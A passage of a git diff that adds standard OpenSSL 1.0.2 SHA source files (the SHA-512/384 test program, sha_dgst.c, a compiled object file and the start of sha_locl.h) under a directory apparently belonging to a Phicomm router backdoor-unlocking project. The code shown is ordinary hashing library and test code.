+/* crypto/sha/sha512t.c */
+/* ====================================================================
+ * Copyright (c) 2004 The OpenSSL Project.  All rights reserved.
+ * ====================================================================
+ */
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+#include <openssl/sha.h>
+#include <openssl/evp.h>
+#include <openssl/crypto.h>
+
+#if defined(OPENSSL_NO_SHA) || defined(OPENSSL_NO_SHA512)
+int main(int argc, char *argv[])
+{
+    printf("No SHA512 support\n");
+    return (0);
+}
+#else
+
+unsigned char app_c1[SHA512_DIGEST_LENGTH] = {
+    0xdd, 0xaf, 0x35, 0xa1, 0x93, 0x61, 0x7a, 0xba,
+    0xcc, 0x41, 0x73, 0x49, 0xae, 0x20, 0x41, 0x31,
+    0x12, 0xe6, 0xfa, 0x4e, 0x89, 0xa9, 0x7e, 0xa2,
+    0x0a, 0x9e, 0xee, 0xe6, 0x4b, 0x55, 0xd3, 0x9a,
+    0x21, 0x92, 0x99, 0x2a, 0x27, 0x4f, 0xc1, 0xa8,
+    0x36, 0xba, 0x3c, 0x23, 0xa3, 0xfe, 0xeb, 0xbd,
+    0x45, 0x4d, 0x44, 0x23, 0x64, 0x3c, 0xe8, 0x0e,
+    0x2a, 0x9a, 0xc9, 0x4f, 0xa5, 0x4c, 0xa4, 0x9f
+};
+
+unsigned char app_c2[SHA512_DIGEST_LENGTH] = {
+    0x8e, 0x95, 0x9b, 0x75, 0xda, 0xe3, 0x13, 0xda,
+    0x8c, 0xf4, 0xf7, 0x28, 0x14, 0xfc, 0x14, 0x3f,
+    0x8f, 0x77, 0x79, 0xc6, 0xeb, 0x9f, 0x7f, 0xa1,
+    0x72, 0x99, 0xae, 0xad, 0xb6, 0x88, 0x90, 0x18,
+    0x50, 0x1d, 0x28, 0x9e, 0x49, 0x00, 0xf7, 0xe4,
+    0x33, 0x1b, 0x99, 0xde, 0xc4, 0xb5, 0x43, 0x3a,
+    0xc7, 0xd3, 0x29, 0xee, 0xb6, 0xdd, 0x26, 0x54,
+    0x5e, 0x96, 0xe5, 0x5b, 0x87, 0x4b, 0xe9, 0x09
+};
+
+unsigned char app_c3[SHA512_DIGEST_LENGTH] = {
+    0xe7, 0x18, 0x48, 0x3d, 0x0c, 0xe7, 0x69, 0x64,
+    0x4e, 0x2e, 0x42, 0xc7, 0xbc, 0x15, 0xb4, 0x63,
+    0x8e, 0x1f, 0x98, 0xb1, 0x3b, 0x20, 0x44, 0x28,
+    0x56, 0x32, 0xa8, 0x03, 0xaf, 0xa9, 0x73, 0xeb,
+    0xde, 0x0f, 0xf2, 0x44, 0x87, 0x7e, 0xa6, 0x0a,
+    0x4c, 0xb0, 0x43, 0x2c, 0xe5, 0x77, 0xc3, 0x1b,
+    0xeb, 0x00, 0x9c, 0x5c, 0x2c, 0x49, 0xaa, 0x2e,
+    0x4e, 0xad, 0xb2, 0x17, 0xad, 0x8c, 0xc0, 0x9b
+};
+
+unsigned char app_d1[SHA384_DIGEST_LENGTH] = {
+    0xcb, 0x00, 0x75, 0x3f, 0x45, 0xa3, 0x5e, 0x8b,
+    0xb5, 0xa0, 0x3d, 0x69, 0x9a, 0xc6, 0x50, 0x07,
+    0x27, 0x2c, 0x32, 0xab, 0x0e, 0xde, 0xd1, 0x63,
+    0x1a, 0x8b, 0x60, 0x5a, 0x43, 0xff, 0x5b, 0xed,
+    0x80, 0x86, 0x07, 0x2b, 0xa1, 0xe7, 0xcc, 0x23,
+    0x58, 0xba, 0xec, 0xa1, 0x34, 0xc8, 0x25, 0xa7
+};
+
+unsigned char app_d2[SHA384_DIGEST_LENGTH] = {
+    0x09, 0x33, 0x0c, 0x33, 0xf7, 0x11, 0x47, 0xe8,
+    0x3d, 0x19, 0x2f, 0xc7, 0x82, 0xcd, 0x1b, 0x47,
+    0x53, 0x11, 0x1b, 0x17, 0x3b, 0x3b, 0x05, 0xd2,
+    0x2f, 0xa0, 0x80, 0x86, 0xe3, 0xb0, 0xf7, 0x12,
+    0xfc, 0xc7, 0xc7, 0x1a, 0x55, 0x7e, 0x2d, 0xb9,
+    0x66, 0xc3, 0xe9, 0xfa, 0x91, 0x74, 0x60, 0x39
+};
+
+unsigned char app_d3[SHA384_DIGEST_LENGTH] = {
+    0x9d, 0x0e, 0x18, 0x09, 0x71, 0x64, 0x74, 0xcb,
+    0x08, 0x6e, 0x83, 0x4e, 0x31, 0x0a, 0x4a, 0x1c,
+    0xed, 0x14, 0x9e, 0x9c, 0x00, 0xf2, 0x48, 0x52,
+    0x79, 0x72, 0xce, 0xc5, 0x70, 0x4c, 0x2a, 0x5b,
+    0x07, 0xb8, 0xb3, 0xdc, 0x38, 0xec, 0xc4, 0xeb,
+    0xae, 0x97, 0xdd, 0xd8, 0x7f, 0x3d, 0x89, 0x85
+};
+
+int main(int argc, char **argv)
+{
+    unsigned char md[SHA512_DIGEST_LENGTH];
+    int i;
+    EVP_MD_CTX evp;
+
+# ifdef OPENSSL_IA32_SSE2
+    /*
+     * Alternative to this is to call OpenSSL_add_all_algorithms... The below
+     * code is retained exclusively for debugging purposes.
+     */
+    {
+        char *env;
+
+        if ((env = getenv("OPENSSL_ia32cap")))
+            OPENSSL_ia32cap = strtoul(env, NULL, 0);
+    }
+# endif
+
+    fprintf(stdout, "Testing SHA-512 ");
+
+    EVP_Digest("abc", 3, md, NULL, EVP_sha512(), NULL);
+    if (memcmp(md, app_c1, sizeof(app_c1))) {
+        fflush(stdout);
+        fprintf(stderr, "\nTEST 1 of 3 failed.\n");
+        return 1;
+    } else
+        fprintf(stdout, ".");
+    fflush(stdout);
+
+    EVP_Digest("abcdefgh" "bcdefghi" "cdefghij" "defghijk"
+               "efghijkl" "fghijklm" "ghijklmn" "hijklmno"
+               "ijklmnop" "jklmnopq" "klmnopqr" "lmnopqrs"
+               "mnopqrst" "nopqrstu", 112, md, NULL, EVP_sha512(), NULL);
+    if (memcmp(md, app_c2, sizeof(app_c2))) {
+        fflush(stdout);
+        fprintf(stderr, "\nTEST 2 of 3 failed.\n");
+        return 1;
+    } else
+        fprintf(stdout, ".");
+    fflush(stdout);
+
+    EVP_MD_CTX_init(&evp);
+    EVP_DigestInit_ex(&evp, EVP_sha512(), NULL);
+    for (i = 0; i < 1000000; i += 288)
+        EVP_DigestUpdate(&evp, "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa"
+                         "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa"
+                         "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa"
+                         "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa"
+                         "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa"
+                         "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa"
+                         "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa"
+                         "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa"
+                         "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa",
+                         (1000000 - i) < 288 ? 1000000 - i : 288);
+    EVP_DigestFinal_ex(&evp, md, NULL);
+    EVP_MD_CTX_cleanup(&evp);
+
+    if (memcmp(md, app_c3, sizeof(app_c3))) {
+        fflush(stdout);
+        fprintf(stderr, "\nTEST 3 of 3 failed.\n");
+        return 1;
+    } else
+        fprintf(stdout, ".");
+    fflush(stdout);
+
+    fprintf(stdout, " passed.\n");
+    fflush(stdout);
+
+    fprintf(stdout, "Testing SHA-384 ");
+
+    EVP_Digest("abc", 3, md, NULL, EVP_sha384(), NULL);
+    if (memcmp(md, app_d1, sizeof(app_d1))) {
+        fflush(stdout);
+        fprintf(stderr, "\nTEST 1 of 3 failed.\n");
+        return 1;
+    } else
+        fprintf(stdout, ".");
+    fflush(stdout);
+
+    EVP_Digest("abcdefgh" "bcdefghi" "cdefghij" "defghijk"
+               "efghijkl" "fghijklm" "ghijklmn" "hijklmno"
+               "ijklmnop" "jklmnopq" "klmnopqr" "lmnopqrs"
+               "mnopqrst" "nopqrstu", 112, md, NULL, EVP_sha384(), NULL);
+    if (memcmp(md, app_d2, sizeof(app_d2))) {
+        fflush(stdout);
+        fprintf(stderr, "\nTEST 2 of 3 failed.\n");
+        return 1;
+    } else
+        fprintf(stdout, ".");
+    fflush(stdout);
+
+    EVP_MD_CTX_init(&evp);
+    EVP_DigestInit_ex(&evp, EVP_sha384(), NULL);
+    for (i = 0; i < 1000000; i += 64)
+        EVP_DigestUpdate(&evp, "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa"
+                         "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa",
+                         (1000000 - i) < 64 ? 1000000 - i : 64);
+    EVP_DigestFinal_ex(&evp, md, NULL);
+    EVP_MD_CTX_cleanup(&evp);
+
+    if (memcmp(md, app_d3, sizeof(app_d3))) {
+        fflush(stdout);
+        fprintf(stderr, "\nTEST 3 of 3 failed.\n");
+        return 1;
+    } else
+        fprintf(stdout, ".");
+    fflush(stdout);
+
+    fprintf(stdout, " passed.\n");
+    fflush(stdout);
+
+    return 0;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha_dgst.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha_dgst.c
new file mode 100644
index 0000000..f77cf5e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha_dgst.c
@@ -0,0 +1,74 @@
+/* crypto/sha/sha1dgst.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/crypto.h>
+#include <openssl/opensslconf.h>
+#if !defined(OPENSSL_NO_SHA0) && !defined(OPENSSL_NO_SHA)
+
+# undef  SHA_1
+# define SHA_0
+
+# include <openssl/opensslv.h>
+
+const char SHA_version[] = "SHA" OPENSSL_VERSION_PTEXT;
+
+/* The implementation is in ../md32_common.h */
+
+# include "sha_locl.h"
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha_dgst.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha_dgst.o
new file mode 100644
index 0000000000000000000000000000000000000000..e114f950927a758ae8d14a7540ebd4f1abdad70f
GIT binary patch
literal 6672
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
H-AMmG0v+Hz

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha_locl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha_locl.h
new file mode 100644
index 0000000..03bd411
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha_locl.h
@@ -0,0 +1,500 @@
+/* crypto/sha/sha_locl.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdlib.h>
+#include <string.h>
+
+#include <openssl/opensslconf.h>
+#include <openssl/sha.h>
+
+#define DATA_ORDER_IS_BIG_ENDIAN
+
+#define HASH_LONG               SHA_LONG
+#define HASH_CTX                SHA_CTX
+#define HASH_CBLOCK             SHA_CBLOCK
+#define HASH_MAKE_STRING(c,s)   do {    \
+        unsigned long ll;               \
+        ll=(c)->h0; (void)HOST_l2c(ll,(s));     \
+        ll=(c)->h1; (void)HOST_l2c(ll,(s));     \
+        ll=(c)->h2; (void)HOST_l2c(ll,(s));     \
+        ll=(c)->h3; (void)HOST_l2c(ll,(s));     \
+        ll=(c)->h4; (void)HOST_l2c(ll,(s));     \
+        } while (0)
+
+#if defined(SHA_0)
+
+# define HASH_UPDATE                    SHA_Update
+# define HASH_TRANSFORM                 SHA_Transform
+# define HASH_FINAL                     SHA_Final
+# define HASH_INIT                      SHA_Init
+# define HASH_BLOCK_DATA_ORDER          sha_block_data_order
+# define Xupdate(a,ix,ia,ib,ic,id)      (ix=(a)=(ia^ib^ic^id))
+
+static void sha_block_data_order(SHA_CTX *c, const void *p, size_t num);
+
+#elif defined(SHA_1)
+
+# define HASH_UPDATE                    SHA1_Update
+# define HASH_TRANSFORM                 SHA1_Transform
+# define HASH_FINAL                     SHA1_Final
+# define HASH_INIT                      SHA1_Init
+# define HASH_BLOCK_DATA_ORDER          sha1_block_data_order
+# if defined(__MWERKS__) && defined(__MC68K__)
+   /* Metrowerks for Motorola fails otherwise:-( <appro@fy.chalmers.se> */
+#  define Xupdate(a,ix,ia,ib,ic,id)     do { (a)=(ia^ib^ic^id);         \
+                                             ix=(a)=ROTATE((a),1);      \
+                                        } while (0)
+# else
+#  define Xupdate(a,ix,ia,ib,ic,id)     ( (a)=(ia^ib^ic^id),    \
+                                          ix=(a)=ROTATE((a),1)  \
+                                        )
+# endif
+
+# ifndef SHA1_ASM
+static
+# endif
+void sha1_block_data_order(SHA_CTX *c, const void *p, size_t num);
+
+#else
+# error "Either SHA_0 or SHA_1 must be defined."
+#endif
+
+#include "md32_common.h"
+
+#define INIT_DATA_h0 0x67452301UL
+#define INIT_DATA_h1 0xefcdab89UL
+#define INIT_DATA_h2 0x98badcfeUL
+#define INIT_DATA_h3 0x10325476UL
+#define INIT_DATA_h4 0xc3d2e1f0UL
+
+#ifdef SHA_0
+fips_md_init(SHA)
+#else
+fips_md_init_ctx(SHA1, SHA)
+#endif
+{
+    memset(c, 0, sizeof(*c));
+    c->h0 = INIT_DATA_h0;
+    c->h1 = INIT_DATA_h1;
+    c->h2 = INIT_DATA_h2;
+    c->h3 = INIT_DATA_h3;
+    c->h4 = INIT_DATA_h4;
+    return 1;
+}
+
+#define K_00_19 0x5a827999UL
+#define K_20_39 0x6ed9eba1UL
+#define K_40_59 0x8f1bbcdcUL
+#define K_60_79 0xca62c1d6UL
+
+/*
+ * As pointed out by Wei Dai <weidai@eskimo.com>, F() below can be simplified
+ * to the code in F_00_19.  Wei attributes these optimisations to Peter
+ * Gutmann's SHS code, and he attributes it to Rich Schroeppel. #define
+ * F(x,y,z) (((x) & (y)) | ((~(x)) & (z))) I've just become aware of another
+ * tweak to be made, again from Wei Dai, in F_40_59, (x&a)|(y&a) -> (x|y)&a
+ */
+#define F_00_19(b,c,d)  ((((c) ^ (d)) & (b)) ^ (d))
